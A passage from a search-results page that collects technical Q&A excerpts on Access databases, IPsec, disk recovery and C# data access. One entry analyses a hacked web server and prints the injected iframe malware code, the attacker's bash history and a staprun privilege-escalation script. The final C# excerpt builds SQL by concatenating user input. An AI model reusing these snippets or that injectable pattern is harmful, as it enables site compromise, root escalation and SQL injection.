Search Results

Search found 19179 results on 768 pages for 'ms security essentials'.

Page 158/768 | < Previous Page | 154 155 156 157 158 159 160 161 162 163 164 165  | Next Page >

  • "Too many indexes on table" error when creating relationships in Microsoft Access 2010.

    - by avianattackarmada
    I have tblUsers which has a primary key of UserID. UserID is used as a foreign key in many tables. Within a table, it is used as a foreign key for multiple fields (e.g. ObserverID, RecorderID, CheckerID). I have successfully added relationships (with in the the MS Access 'Relationship' view), where I have table aliases to do the multiple relationships per table: *tblUser.UserID - 1 to many - tblResight.ObserverID *tblUser_1.UserID - 1 to many - tblResight.CheckerID After creating about 25 relationships with enforcement of referential integrity, when I try to add an additional one, I get the following error: "The operation failed. There are too many indexes on table 'tblUsers.' Delete some of the indexes on the table and try the operation again." I ran the code I found here and it returned that I have 6 indexes on tblUsers. I know there is a limit of 32 indexes per table. Am I using the relationship GUI wrong? Does access create an index for the enforcement of referential integrity any time I create a relationship (especially indexes that wouldn't turn up when I ran the script)? I'm kind of baffled, any help would be appreciated.

    Read the article

  • VB.NET Update Access Database with DataTable

    - by sinDizzy
    I've been perusing some hep forums and some help books but cant seem to get my head wrapped around this. My task is to read data from two text files and then load that data into an existing MS Access 2007 database. So here is what i'm trying to do: Read data from first text file and for every line of data add data to a DataTable using CarID as my unique field. Read data from second text file and look for existing CarID in DataTable if exists update that row. If it doesnt exist add a new row. once im done push the contents of the DataTable to the database. What i have so far: Dim sSQL As String = "SELECT * FROM tblCars" Dim da As New OleDb.OleDbDataAdapter(sSQL, conn) Dim ds As New DataSet da.Fill(ds, "CarData") Dim cb As New OleDb.OleDbCommandBuilder(da) 'loop read a line of text and parse it out. gets dd, dc, and carId 'create a new empty row Dim dsNewRow As DataRow = ds.Tables("CarData").NewRow() 'update the new row with fresh data dsNewRow.Item("DriveDate") = dd dsNewRow.Item("DCode") = dc dsNewRow.Item("CarNum") = carID 'about 15 more fields 'add the filled row to the DataSet table ds.Tables("CarData").Rows.Add(dsNewRow) 'end loop 'update the database with the new rows da.Update(ds, "CarData") Questions: In constructing my table i use "SELECT * FROM tblCars" but what if that table has millions of records already. Is that not a waste of resources? Should i be trying something different if i want to update with new records? Once Im done with the first text file i then go to my next text file. Whats the best approach here: To First look for an existing record based on CarNum or to create a second table and then merge the two at the end? Finally when the DataTable is done being populated and im pushing it to the database i want to make sure that if records already exist with three primary fields (DriveDate, DCode, and CarNum) that they get updated with new fields and if it doesn't exist then those records get appended. Is that possible with my process? tia AGP

    Read the article

  • Selecting More Than 1 Table in A Single Query

    - by Kamran
    I have 5 Tables in MS Access as Logs [Title, ID, Date, Author] Tape [Title, ID, Date, Author] Maps [Title, ID, Date, Author] VCDs [Title, ID, Date, Author] Book [Title, ID, Date, Author] I tried my level best through this code SELECT Logs.[Author], Tape.[Author], Maps.[Author], VCDs.[Author], Book.[Author] FROM Logs , Tape , Maps , VCDs, Book WHERE ((([Author] & " " & [Author] & " " & [Author] & " " & [Author]& " " & [Author]) Like "*" & [Type the Title or Any Part of the Title and Press Ok] & "*")); I want to select all of these fields in a single query. Suppose there is Adam as author of works in all tables. So when i put Adam in search box it should result from all tables. I know this can be done by having single table or renaming fields names but that's not required. Please help.

    Read the article

  • How to close and open access to SQL Server 2008 in Windows application?

    - by hgulyan
    Hi, I have a MS Access 97 application (but the question is general) working directly with SQL Server 2008 (without application server or anything). Numbers of users can be up to 1000. Windows Authentication is used. The question is: How to handle modes, so some users will be allowed to work in read-only mode some users won't have access to db for some time My versions: Using a table with a mode id for every group of users, that will work the same way. On Form Load application will query that table for mode id. Using trigger on the tables, that must work according to that mode. The trigger will query mode value and doesn't work if access is closed or it's in read-only mode I know these are not the best solutions, that's why I'm asking for your advice. There's one more point. If the mode is changed to "access-is-closed" for a group of users, that group must not be able to query to DB starting that moment. With first solution I wrote it won't work, because user can be in application at that moment and no form load event will work. How can I do this? Is there any optimal solution? Thank you. Any help would be appreciated.

    Read the article

  • C# and Excel best practices

    - by rlp
    I am doing a lot of MS Excel interop i C# (Visual Studio 2012) using Microsoft.Office.Interop.Excel. It requires a lot of tiresome manual code to include Excel formulas, doing formatting of text and numbers, and making graphs. I would like it very much if any of you have some input on how I do the task better. I have been looking at Visual Studio Tools for Office, but I am uncertain on its functions. I get it is required to make Excel add-ins, but does it help doing Excel automation? I have desperately been trying to find information on working with Excel in Visual Studio 2012 using C#. I did found some good but short tutorials. However I really would like a book an the subject to learn the field more in depth regarding functionality and best practices. Searching Amazon with my limited knowlegde only gives me book on VSTO using older versions of Visual Studio. I would not like to use VBA. My applications use Excel mainly for visualizing compiled from different sources. I also to data processing where Excel is not required. Futhermore, I can write C# but not VB.

    Read the article

  • Batch Inserts And Prepared Query Error

    - by ircmaxell
    Ok, so I need to populate a MS Access database table with results from a MySQL query. That's not hard at all. I've got the program written to where it copies a template .mdb file to a temp name and opens it via odbc. No problem so far. I've noticed that Access does not support batch inserting (VALUES (foo, bar), (second, query), (third query)). So that means I need to execute one query per row (there are potentially hundreds of thousands of rows). Initial performance tests show a rate of around 900 inserts/sec into Access. With our largest data sets, that could mean execution times of minutes (Which isn't the end of the world, but obviously the faster the better). So, I tried testing a prepared statement. But I keep getting an error (Warning: odbc_execute() [function.odbc-execute]: SQL error: [Microsoft][ODBC Microsoft Access Driver]COUNT field incorrect , SQL state 07001 in SQLExecute in D:\....php on line 30). Here's the code I'm using (Line 30 is odbc_execute): $sql = 'INSERT INTO table ([field0], [field1], [field2], [field3], [field4], [field5]) VALUES (?, ?, ?, ?, ?, ?)'; $stmt = odbc_prepare($conn, $sql); for ($i = 200001; $i < 300001; $i++) { $a = array($i, "Field1 $", "Field2 $i", "Field3 $i", "Field4 $i", $i); odbc_execute($stmt, $a); } So my question is two fold. First, is there any idea on why I'm getting that error (I've checked, and the number in the array matches the field list which matches the number of parameter ? markers)? And second, should I even bother with this or just use the straight INSERT statements? Like I said, time isn't critical, but if it's possible, I'd like to get that time as low as possible (Then again, I may be limited by disk throughput, since 900 operations/sec is high already)... Thanks

    Read the article

  • Managing modes in Windows application working directly with SQL Server 2008

    - by hgulyan
    Hi, I have a MS Access 97 application (but the question is general) working directly with SQL Server 2008 (without application server or anything). Numbers of users can be up to 1000. Windows Authentication is used. The question is: How to handle modes, so some users will be allowed to work in read-only mode some users won't have access to db for some time My versions: Using a table with a mode id for every group of users, that will work the same way. On Form Load application will query that table for mode id. Using trigger on the tables, that must work according to that mode. The trigger will query mode value and doesn't work if access is closed or it's in read-only mode I know it's not these are not the best solutions, that's why I'm asking for your advice. There's one more point. If the mode is changed to "access-is-closed" for a group of users, that group must not be able to query to DB starting that moment. With first solution I wrote it won't work, because user can be in application at that moment and no form load event will work. How can I do this? Is there any optimal solution? Thank you. Any help would be appreciated.

    Read the article

  • OpenSwan IPSec phase #2 complications

    - by XXL
    Phase #1 (IKE) succeeds without any problems (verified at the target host). Phase #2 (IPSec), however, is erroneous at some point (apparently due to misconfiguration on localhost). This should be an IPSec-only connection. I am using OpenSwan on Debian. The error log reads the following (the actual IP-addr. of the remote endpoint has been modified): pluto[30868]: "x" #2: initiating Quick Mode PSK+ENCRYPT+PFS+UP+IKEv2ALLOW+SAREFTRACK {using isakmp#1 msgid:5ece82ee proposal=AES(12)_256-SHA1(2)_160 pfsgroup=OAKLEY_GROUP_DH22} pluto[30868]: "x" #1: ignoring informational payload, type NO_PROPOSAL_CHOSEN msgid=00000000 pluto[30868]: "x" #1: received and ignored informational message pluto[30868]: "x" #1: the peer proposed: 0.0.0.0/0:0/0 - 0.0.0.0/0:0/0 pluto[30868]: "x" #3: responding to Quick Mode proposal {msgid:a4f5a81c} pluto[30868]: "x" #3: us: 192.168.1.76<192.168.1.76[+S=C] pluto[30868]: "x" #3: them: 222.222.222.222<222.222.222.222[+S=C]===10.196.0.0/17 pluto[30868]: "x" #3: transition from state STATE_QUICK_R0 to state STATE_QUICK_R1 pluto[30868]: "x" #3: STATE_QUICK_R1: sent QR1, inbound IPsec SA installed, expecting QI2 pluto[30868]: "x" #1: ignoring informational payload, type NO_PROPOSAL_CHOSEN msgid=00000000 pluto[30868]: "x" #1: received and ignored informational message pluto[30868]: "x" #3: next payload type of ISAKMP Hash Payload has an unknown value: 97 X pluto[30868]: "x" #3: malformed payload in packet pluto[30868]: | payload malformed after IV I am behind NAT and this is all coming from wlan2. Here are the details: default via 192.168.1.254 dev wlan2 proto static 169.254.0.0/16 dev wlan2 scope link metric 1000 192.168.1.0/24 dev wlan2 proto kernel scope link src 192.168.1.76 metric 2 Output of ipsec verify: Checking your system to see if IPsec got installed and started correctly: Version check and ipsec on-path [OK] Linux Openswan U2.6.37/K3.2.0-24-generic (netkey) Checking for IPsec support in kernel [OK] SAref kernel support [N/A] NETKEY: Testing XFRM related proc values [OK] [OK] [OK] Checking that pluto is running [OK] Pluto listening for IKE on udp 500 [OK] Pluto listening for NAT-T on udp 4500 [OK] Two or more interfaces found, checking IP forwarding [OK] Checking NAT and MASQUERADEing [OK] Checking for 'ip' command [OK] Checking /bin/sh is not /bin/dash [WARNING] Checking for 'iptables' command [OK] Opportunistic Encryption Support [DISABLED] This is what happens when I run ipsec auto --up x: 104 "x" #1: STATE_MAIN_I1: initiate 003 "x" #1: received Vendor ID payload [RFC 3947] method set to=109 106 "x" #1: STATE_MAIN_I2: sent MI2, expecting MR2 003 "x" #1: received Vendor ID payload [Cisco-Unity] 003 "x" #1: received Vendor ID payload [Dead Peer Detection] 003 "x" #1: ignoring unknown Vendor ID payload [502099ff84bd4373039074cf56649aad] 003 "x" #1: received Vendor ID payload [XAUTH] 003 "x" #1: NAT-Traversal: Result using RFC 3947 (NAT-Traversal): i am NATed 108 "x" #1: STATE_MAIN_I3: sent MI3, expecting MR3 004 "x" #1: STATE_MAIN_I4: ISAKMP SA established {auth=OAKLEY_PRESHARED_KEY cipher=aes_128 prf=oakley_sha group=modp1024} 117 "x" #2: STATE_QUICK_I1: initiate 010 "x" #2: STATE_QUICK_I1: retransmission; will wait 20s for response 010 "x" #2: STATE_QUICK_I1: retransmission; will wait 40s for response 031 "x" #2: max number of retransmissions (2) reached STATE_QUICK_I1. No acceptable response to our first Quick Mode message: perhaps peer likes no proposal 000 "x" #2: starting keying attempt 2 of at most 3, but releasing whack I have enabled NAT traversal in ipsec.conf accordingly. Here are the settings relative to the connection in question: version 2.0 config setup plutoopts="--perpeerlog" plutoopts="--interface=wlan2" dumpdir=/var/run/pluto/ nat_traversal=yes virtual_private=%v4:10.0.0.0/8,%v4:192.168.0.0/16,%v4:172.16.0.0/12 oe=off protostack=netkey conn x authby=secret pfs=yes auto=add phase2alg=aes256-sha1;dh22 keyingtries=3 ikelifetime=8h type=transport left=192.168.1.76 leftsubnet=192.168.1.0/24 leftprotoport=0/0 right=222.222.222.222 rightsubnet=10.196.0.0/17 rightprotoport=0/0 Here are the specs provided by the other end that must be met for Phase #2: encryption algorithm: AES (128 or 256 bit) hash algorithm: SHA local ident1 (addr/mask/prot/port): (10.196.0.0/255.255.128.0/0/0) local ident2 (addr/mask/prot/port): (10.241.0.0/255.255.0.0/0/0) remote ident (addr/mask/prot/port): (x.x.x.x/x.x.x.x/0/0) (internal network or localhost) Security association lifetime: 4608000 kilobytes/3600 seconds PFS: DH group2 So, finally, what might be the cause of the issue that I am experiencing? Thank you.

    Read the article

  • Mass targeted malware installed - g00glestatic.com [closed]

    - by Silver89
    Possible Duplicate: My server’s been hacked EMERGENCY I run a webserver which over the last few days seems to have become infected with malware that tries to include content from "http://g00glestatic.com/s.js" It appears the attacker gained access to one of the user accounts (not root), made a few changes, added a few files and ran a few bash commands. These changes stuck out clearly to me because it is not a shared server and I am the only person with access through very secure passwords. The php/javascript code that was added .php files, this code was added: #9c282e# if(!$srvc_counter) { echo "<script type=\"text/javascript\" src=\"http://g00glestatic.com/s.js\"></script>"; $srvc_counter = true;} #/9c282e# .js files, this code was added: /*9c282e*/ var _f = document.createElement('iframe'),_r = 'setAttribute'; _f[_r]('src', 'http://g00glestatic.com/s.js'); _f.style.position = 'absolute';_f.style.width = '10px'; _f[_r]('frameborder', navigator.userAgent.indexOf('bf3f1f8686832c30d7c764265f8e7ce8') + 1); _f.style.left = '-5540px'; document.write('<div id=\'MIX_ADS\'></div>'); document.getElementById('MIX_ADS').appendChild(_f); /*/9c282e*/ The bash command taken from .bash_history (Some usernames/passwords have been subbed) su -c id $replacedPassword id; id; sudo id; replacedPassword id; cd /home/replacedUserId1; chmod +x .sess_28e2f1bc755ed3ca48b32fbcb55b91a7; ./.sess_28e2f1bc755ed3ca48b32fbcb55b91a7; rm /home/replacedUserId1/.sess_28e2f1bc755ed3ca48b32fbcb55b91a7; id; cd /home/replacedUserId1; chmod +x .sess_05ee5257fed0ac8e0f12096f4c3c0d20; ./.sess_05ee5257fed0ac8e0f12096f4c3c0d20; rm /home/replacedUserId1/.sess_05ee5257fed0ac8e0f12096f4c3c0d20; id; cd /home/replacedUserId1; chmod +x .sess_bfa542fc2578cce68eb373782c5689b9; ./.sess_bfa542fc2578cce68eb373782c5689b9; rm /home/replacedUserId1/.sess_bfa542fc2578cce68eb373782c5689b9; id; cd /home/replacedUserId1; chmod +x .sess_bfa542fc2578cce68eb373782c5689b9; ./.sess_bfa542fc2578cce68eb373782c5689b9; rm /home/replacedUserId1/.sess_bfa542fc2578cce68eb373782c5689b9; id; cd /home/replacedUserId1; chmod +x .sess_fb19dfb52ed4a3ae810cd4454ac6ef1e; ./.sess_fb19dfb52ed4a3ae810cd4454ac6ef1e; rm /home/replacedUserId1/.sess_fb19dfb52ed4a3ae810cd4454ac6ef1e; id; kill -9 $$;; kill -9 $$;; kill -9 $$; The above seems to move files added to the public_html to the level above? I also have all 4 of the files that were added: .sess_28e2f1bc755ed3ca48b32fbcb55b91a7 .sess_05ee5257fed0ac8e0f12096f4c3c0d20 .sess_bfa542fc2578cce68eb373782c5689b9 .sess_fb19dfb52ed4a3ae810cd4454ac6ef1e Of those four above files, three are none viewable in notepad++ and display null characters, whereas sess_fb19dfb52ed4a3ae810cd4454ac6ef1e consists of: #!/bin/sh export PATH=$PATH:/sbin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/bin; export LC_ALL=en_US.UTF-8 LC_COLLATE=en_US.UTF-8 LC_CTYPE=en_US.UTF-8 LANG=en_US.UTF-8 LANGUAGE=en_US.UTF-8 export TERM=linux echo -n "-> checking staprun: "; if which staprun 2>&1 | grep -q "no $1"; then flag=1 elif [ -z "`which $1 2>&1`" ]; then flag=1; fi if [ "$flag" = "1" ]; then echo "no staprun, exiting"; exit; else echo "found"; echo "-> trying to exploit... "; printf "install uprobes /bin/sh" > ololo.conf; MODPROBE_OPTIONS="-C ololo.conf" staprun -u ololo rm -f ololo.conf fi Other Noticeable Edits Any files that contain: ([.htaccess]|[index|header|footer].php|[*.js]) will have been modified and all system file and directory permissions will have been changed to: x--x--x My steps to remove this malware re uploaded original php/js files to revert any changes Changed all user passwords Modified hosts.allow to a static ip so that only I have access Removed the above 4 files and checked all modified file dates within that directory to check for any other recent modifications, none can be found Conclusion I'm hoping that as they did not have root access, any changes they wished to make higher up failed and they were only able to display an iframe on the site for a short amount of time? What else do I need to look for to check the malware infection has not spread? Second Conclusion This malware sinks too deep to 'clean', if you get infected I recommend a server nuke and rebuild from backups with increased security. Possibility It's possible that Filezilla ftp passwords were stolen through a trojan as they're unfortunately stored unencrypted. However Trend Micro Titanium has not found any. The settings box to disable passwords being saved has now been ticked, I also recommend that you take this action.

    Read the article

  • Need help with testdisk output

    - by dan
    I had (note the past tense) an ubuntu 12.04 system with separate partitions for the base and /home directories. It started acting wonky, so I decided to do a reinstall with 12.10, intending just to do a reinstall to the base partition. After several seconds, I realize that the installer was repartitioning the drive and reinstalling, so I pulled the power cord. I'm now trying to recover as much as I can with testdisk, but it seems that testdisk is finding 100 unique partitions when I run it - they mostly tend to be HFS+ or solaris /home (which I think is just an ext4; I've never had solaris on the machine). I've pasted an abbreviated version of the testdisk output below (first ~100 lines, and then ~100 lines from the middle of the output). Is there a way to combine or recreate the partitions and then data recovery, or some other way maximize what I can recover (ideally as much of the file system as possible)? I really only care about what was in the /home directory - I'd rather not use photorec since I don't have another 2 TB HD lying around to recover to. Thanks, Dan Mon Dec 10 06:03:00 2012 Command line: TestDisk TestDisk 6.13, Data Recovery Utility, November 2011 Christophe GRENIER <[email protected]> http://www.cgsecurity.org OS: Linux, kernel 3.2.34-std312-amd64 (#2 SMP Sat Nov 17 08:06:32 UTC 2012) x86_64 Compiler: GCC 4.4 Compilation date: 2012-11-27T22:44:52 ext2fs lib: 1.42.6, ntfs lib: libntfs-3g, reiserfs lib: 0.3.1-rc8, ewf lib: none /dev/sda: LBA, HPA, LBA48, DCO support /dev/sda: size 3907029168 sectors /dev/sda: user_max 3907029168 sectors /dev/sda: native_max 3907029168 sectors Warning: can't get size for Disk /dev/mapper/control - 0 B - CHS 1 1 1, sector size=512 /dev/sr0 is not an ATA disk Hard disk list Disk /dev/sda - 2000 GB / 1863 GiB - CHS 243201 255 63, sector size=512 - WDC WD20EARS-00J2GB0, S/N:WD-WCAYY0075071, FW:80.00A80 Disk /dev/sdb - 1013 MB / 967 MiB - CHS 1014 32 61, sector size=512 - Generic Flash Disk, FW:8.07 Disk /dev/sr0 - 367 MB / 350 MiB - CHS 179470 1 1 (RO), sector size=2048 - PLDS DVD+/-RW DH-16AAS, FW:JD12 Partition table type (auto): Intel Disk /dev/sda - 2000 GB / 1863 GiB - WDC WD20EARS-00J2GB0 Partition table type: EFI GPT Analyse Disk /dev/sda - 2000 GB / 1863 GiB - CHS 243201 255 63 Current partition structure: Bad GPT partition, invalid signature. search_part() Disk /dev/sda - 2000 GB / 1863 GiB - CHS 243201 255 63 recover_EXT2: s_block_group_nr=0/14880, s_mnt_count=5/4294967295, s_blocks_per_group=32768, s_inodes_per_group=8192 recover_EXT2: s_blocksize=4096 recover_EXT2: s_blocks_count 487593984 recover_EXT2: part_size 3900751872 MS Data 2048 3900753919 3900751872 EXT4 Large file Sparse superblock, 1997 GB / 1860 GiB Linux Swap 3900755968 3907028975 6273008 SWAP2 version 1, 3211 MB / 3062 MiB Results P MS Data 2048 3900753919 3900751872 EXT4 Large file Sparse superblock, 1997 GB / 1860 GiB P Linux Swap 3900755968 3907028975 6273008 SWAP2 version 1, 3211 MB / 3062 MiB interface_write() 1 P MS Data 2048 3900753919 3900751872 2 P Linux Swap 3900755968 3907028975 6273008 search_part() Disk /dev/sda - 2000 GB / 1863 GiB - CHS 243201 255 63 recover_EXT2: s_block_group_nr=0/14880, s_mnt_count=5/4294967295, s_blocks_per_group=32768, s_inodes_per_group=8192 recover_EXT2: s_blocksize=4096 recover_EXT2: s_blocks_count 487593984 recover_EXT2: part_size 3900751872 MS Data 2048 3900753919 3900751872 EXT4 Large file Sparse superblock, 1997 GB / 1860 GiB block_group_nr 1 recover_EXT2: "e2fsck -b 32768 -B 4096 device" may be needed recover_EXT2: s_block_group_nr=1/14880, s_mnt_count=0/4294967295, s_blocks_per_group=32768, s_inodes_per_group=8192 recover_EXT2: s_blocksize=4096 recover_EXT2: s_blocks_count 487593984 recover_EXT2: part_size 3900751872 MS Data 2046 3900753917 3900751872 EXT4 Large file Sparse superblock Backup superblock, 1997 GB / 1860 GiB block_group_nr 1 recover_EXT2: "e2fsck -b 32768 -B 4096 device" may be needed recover_EXT2: s_block_group_nr=1/14880, s_mnt_count=0/4294967295, s_blocks_per_group=32768, s_inodes_per_group=8192 recover_EXT2: s_blocksize=4096 recover_EXT2: s_blocks_count 487593984 recover_EXT2: part_size 3900751872 MS Data 2048 3900753919 3900751872 EXT4 Large file Sparse superblock Backup superblock, 1997 GB / 1860 GiB block_group_nr 1 recover_EXT2: "e2fsck -b 32768 -B 4096 device" may be needed recover_EXT2: s_block_group_nr=1/14584, s_mnt_count=0/27, s_blocks_per_group=32768, s_inodes_per_group=8192 recover_EXT2: s_blocksize=4096 recover_EXT2: s_blocks_count 477915164 recover_EXT2: part_size 3823321312 MS Data 4094 3823325405 3823321312 EXT4 Large file Sparse superblock Backup superblock, 1957 GB / 1823 GiB block_group_nr 1 ....snip...... MS Data 2046 3900753917 3900751872 EXT4 Large file Sparse superblock Backup superblock, 1997 GB / 1860 GiB MS Data 2048 3900753919 3900751872 EXT4 Large file Sparse superblock, 1997 GB / 1860 GiB MS Data 4094 3823325405 3823321312 EXT4 Large file Sparse superblock Backup superblock, 1957 GB / 1823 GiB MS Data 4096 3823325407 3823321312 EXT4 Large file Sparse superblock Backup superblock, 1957 GB / 1823 GiB MS Data 7028840 7033383 4544 FAT12, 2326 KB / 2272 KiB Mac HFS 67856948 67862179 5232 HFS+ found using backup sector!, 2678 KB / 2616 KiB Mac HFS 67862176 67867407 5232 HFS+, 2678 KB / 2616 KiB Mac HFS 67862244 67867475 5232 HFS+ found using backup sector!, 2678 KB / 2616 KiB Mac HFS 67867404 67872635 5232 HFS+, 2678 KB / 2616 KiB Mac HFS 67867472 67872703 5232 HFS+, 2678 KB / 2616 KiB Mac HFS 67872700 67877931 5232 HFS+, 2678 KB / 2616 KiB Mac HFS 67937834 67948067 10234 [EasyInstall_OSX] HFS found using backup sector!, 5239 KB / 5117 KiB Mac HFS 67938012 67948155 10144 HFS+ found using backup sector!, 5193 KB / 5072 KiB Mac HFS 67948064 67958297 10234 [EasyInstall_OSX] HFS, 5239 KB / 5117 KiB Mac HFS 67948070 67958303 10234 [EasyInstall_OSX] HFS found using backup sector!, 5239 KB / 5117 KiB Mac HFS 67948152 67958295 10144 HFS+, 5193 KB / 5072 KiB Mac HFS 67958292 67968435 10144 HFS+, 5193 KB / 5072 KiB Mac HFS 67958300 67968533 10234 [EasyInstall_OSX] HFS, 5239 KB / 5117 KiB Mac HFS 67992596 67997827 5232 HFS+ found using backup sector!, 2678 KB / 2616 KiB Mac HFS 67997824 68003055 5232 HFS+, 2678 KB / 2616 KiB Mac HFS 67997892 68003123 5232 HFS+ found using backup sector!, 2678 KB / 2616 KiB Mac HFS 68003052 68008283 5232 HFS+, 2678 KB / 2616 KiB Mac HFS 68003120 68008351 5232 HFS+, 2678 KB / 2616 KiB Mac HFS 68008348 68013579 5232 HFS+, 2678 KB / 2616 KiB Solaris /home 84429840 123499141 39069302 UFS1, 20 GB / 18 GiB Solaris /home 84429952 123499253 39069302 UFS1, 20 GB / 18 GiB Solaris /home 84493136 123562437 39069302 UFS1, 20 GB / 18 GiB Solaris /home 84493248 123562549 39069302 UFS1, 20 GB / 18 GiB Solaris /home 84566088 123635389 39069302 UFS1, 20 GB / 18 GiB Solaris /home 84566200 123635501 39069302 UFS1, 20 GB / 18 GiB Solaris /home 84571232 123640533 39069302 UFS1, 20 GB / 18 GiB Solaris /home 84571344 123640645 39069302 UFS1, 20 GB / 18 GiB Solaris /home 84659952 123729253 39069302 UFS1, 20 GB / 18 GiB Solaris /home 84660064 123729365 39069302 UFS1, 20 GB / 18 GiB Solaris /home 84690504 123759805 39069302 UFS1, 20 GB / 18 GiB Solaris /home 84690616 123759917 39069302 UFS1, 20 GB / 18 GiB Solaris /home 84700424 123769725 39069302 UFS1, 20 GB / 18 GiB Solaris /home 84700536 123769837 39069302 UFS1, 20 GB / 18 GiB Solaris /home 84797720 123867021 39069302 UFS1, 20 GB / 18 GiB Solaris /home 84797832 123867133 39069302 UFS1, 20 GB / 18 GiB Solaris /home 84812544 123881845 39069302 UFS1, 20 GB / 18 GiB Solaris /home 84812656 123881957 39069302 UFS1, 20 GB / 18 GiB Solaris /home 84824552 123893853 39069302 UFS1, 20 GB / 18 GiB Solaris /home 84824664 123893965 39069302 UFS1, 20 GB / 18 GiB Solaris /home 84847528 123916829 39069302 UFS1, 20 GB / 18 GiB Solaris /home 84847640 123916941 39069302 UFS1, 20 GB / 18 GiB Solaris /home 84886840 123956141 39069302 UFS1, 20 GB / 18 GiB Solaris /home 84886952 123956253 39069302 UFS1, 20 GB / 18 GiB Solaris /home 84945488 124014789 39069302 UFS1, 20 GB / 18 GiB Solaris /home 84945600 124014901 39069302 UFS1, 20 GB / 18 GiB Solaris /home 84957992 124027293 39069302 UFS1, 20 GB / 18 GiB Solaris /home 84958104 124027405 39069302 UFS1, 20 GB / 18 GiB Solaris /home 84962240 124031541 39069302 UFS1, 20 GB / 18 GiB Solaris /home 84962352 124031653 39069302 UFS1, 20 GB / 18 GiB Solaris /home 84977168 124046469 39069302 UFS1, 20 GB / 18 GiB Solaris /home 84977280 124046581 39069302 UFS1, 20 GB / 18 GiB MS Data 174395467 178483851 4088385 ..... snip (it keeps going on for quite a while)

    Read the article

  • Installing VSTO 4.0 Causes VSTO 3.0 Addin to quit working

    - by Jacob Adams
    I just installed Visual Studio 2010 yesterday. As part of that I installed VSTO 4.0. Now when I run any Office application, my VSTO 3.0 addins fail to load. The error in the event log is Customization URI: file:///H:/PathToMyAddin/MyAddin.vsto Exception: Customization does not have the permissions required to create an application domain. ***** Exception Text ******* Microsoft.VisualStudio.Tools.Applications.Runtime.CannotCreateCustomizationDomainException: Customization does not have the permissions required to create an application domain. --- System.Security.SecurityException: Customized functionality in this application will not work because the administrator has listed file:///H:/PathToMyAddin/MyAddin.vsto as untrusted. Contact your administrator for further assistance. at Microsoft.VisualStudio.Tools.Office.Runtime.RuntimeUtilities.VerifySolutionUri(Uri uri) at Microsoft.VisualStudio.Tools.Office.Runtime.DomainCreator.CreateCustomizationDomainInternal(String solutionLocation, String manifestName, String documentName, Boolean showUIDuringDeployment, IntPtr hostServiceProvider, IntPtr& executor) The Zone of the assembly that failed was: MyComputer It seems like like maybe this is due to it trying to load different version of .NET is the same process/AppDomain. However the error would indicate it's some sort of permissions issue.

    Read the article

  • Access DB Transaction Insert limit

    - by user986363
    Is there a limit to the amount of inserts you can do within an Access transaction before you need to commit or before Access/Jet throws an error? I'm currently running the following code in hopes to determine what this maximum is. OleDbConnection cn = new OleDbConnection( @"Provider=Microsoft.ACE.OLEDB.12.0;Data Source=C:\temp\myAccessFile.accdb;Persist Security Info=False;"); try { cn.Open(); oleCommand = new OleDbCommand("BEGIN TRANSACTION", cn); oleCommand.ExecuteNonQuery(); oleCommand.CommandText = "insert into [table1] (name) values ('1000000000001000000000000010000000000000')"; for (i = 0; i < 25000000; i++) { oleCommand.ExecuteNonQuery(); } oleCommand.CommandText = "COMMIT"; oleCommand.ExecuteNonQuery(); } catch (Exception ex) { } finally { try { oleCommand.CommandText = "COMMIT"; oleCommand.ExecuteNonQuery(); } catch{} if (cn.State != ConnectionState.Closed) { cn.Close(); } } The error I received on a production application when I reached 2,333,920 inserts in a single uncommited transaction was: "File sharing lock count exceeded. Increase MaxLocksPerFile registry entry". Disabling transactions fixed this problem.

    Read the article

  • Importing Excel spreadsheet data into existing Access DB

    - by Keeb13r
    I've designed an Access 2003 DB with 3 tables: APPLICATIONS, SERVERS, and INSTALLATIONS. Records in the APPLICATIONS and SERVERS tables are uniquely identified by a synthetic primary key (in Access, an "auto number"). The INSTALLATIONS table is essentially a mapping table between APPLICATIONS and SERVERS: it's a list of records of which applications are installed on which servers. A record in the INSTALLATIONS table is also identified by a synthetic primary key, and it consists of an APPLICATION_ID and SERVER_ID for the records in their respective tables. I have an Excel 2003 spreadsheet I would like to import into this database, but it's proving difficult. The spreadsheet is made up of several tabs/worksheets, each one representing a server with its own listing of installed applications. I'm not sure how to proceed with an import - the "Get External Data -- Import" feature in Access has an import "In an Existing Table" option, but it's greyed out. I'm also unsure how I build the relationships between applications and servers for importing records into the INSTALLATIONS table. I had previously fooled around with adding some security to the Access DB file. I think I removed everything but perhaps I didn't and that's causing the problem? Some sample data from the Excel spreadsheet: SERVER101 * Adobe Reader 9 * BMC Remedy User 7.0 * HostExplorer 2008 * Microsoft Office 2003 * Microsoft Office 2007 * Notepad++ SERVER102 * Adobe Reader 9 * DameWare Mini Remote Control * Microsoft Office 2003 * Microsoft .NET Framework 3.5 SP1 * Oracle 9.2 SERVER103 * AWDView * EXTRA! Personal Client 32-bit * Microsoft Office 2003 * Microsoft .NET Framework 3.5 SP1 * Snagit 9.1 * WinZip 12.1 The Access DB design is very simple: APPLICATION * APPLICATION_ID (autonumber) * APPLICATION_NAME (varchar) SERVER * SERVER_ID (autonumber) * SERVER_NAME (varchar) INSTALLATION * INSTALLATION_ID (autonumber) * APPLICATION_ID (number) * SERVER_ID (number)

    Read the article

  • ExecuteNonQuery: Connection property has not been initialized

    - by 20151012
    I get an error in my code: The error point at dbcom.ExecuteNonQuery();. Code(connection) public admin_addemp() { InitializeComponent(); con = new OleDbConnection(@"Provider=Microsoft.ACE.OLEDB.12.0;Data Source=|DataDirectory|\EMPS.accdb;Persist Security Info=True"); con.Open(); ds.Tables.Add(dt); ds.Tables.Add(dt2); } Code (Save button) private void save_btn_Click(object sender, EventArgs e) { OleDbCommand check = new OleDbCommand(); check.Connection = con; check.CommandText = "SELECT COUNT(*) FROM employeeDB WHERE ([EmployeeName]=?)"; check.Parameters.AddWithValue("@EmployeeName", tb_name.Text); if (Convert.ToInt32(check.ExecuteScalar()) == 0) { dbcom2 = new OleDbCommand("SELECT EmployeeID FROM employeeDB WHERE EmployeeID='" + tb_id.Text + "'", con); OleDbParameter param = new OleDbParameter(); param.ParameterName = tb_id.Text; dbcom.Parameters.Add(param); OleDbDataReader read = dbcom2.ExecuteReader(); if (read.HasRows) { MessageBox.Show("The Employee ID '" + tb_id.Text + "' already exist. Please choose another Employee ID."); read.Dispose(); read.Close(); } else { string q = "INSERT INTO employeeDB (EmployeeID, EmployeeName, IC, Address, State, " + " Postcode, DateHired, Phone, ManagerName) VALUES ('" + tb_id.Text + "', " + " '" + tb_name.Text + "', '" + tb_ic.Text + "', '" + tb_add1.Text + "', '" + cb_state.Text + "', " + " '" + tb_postcode.Text + "', 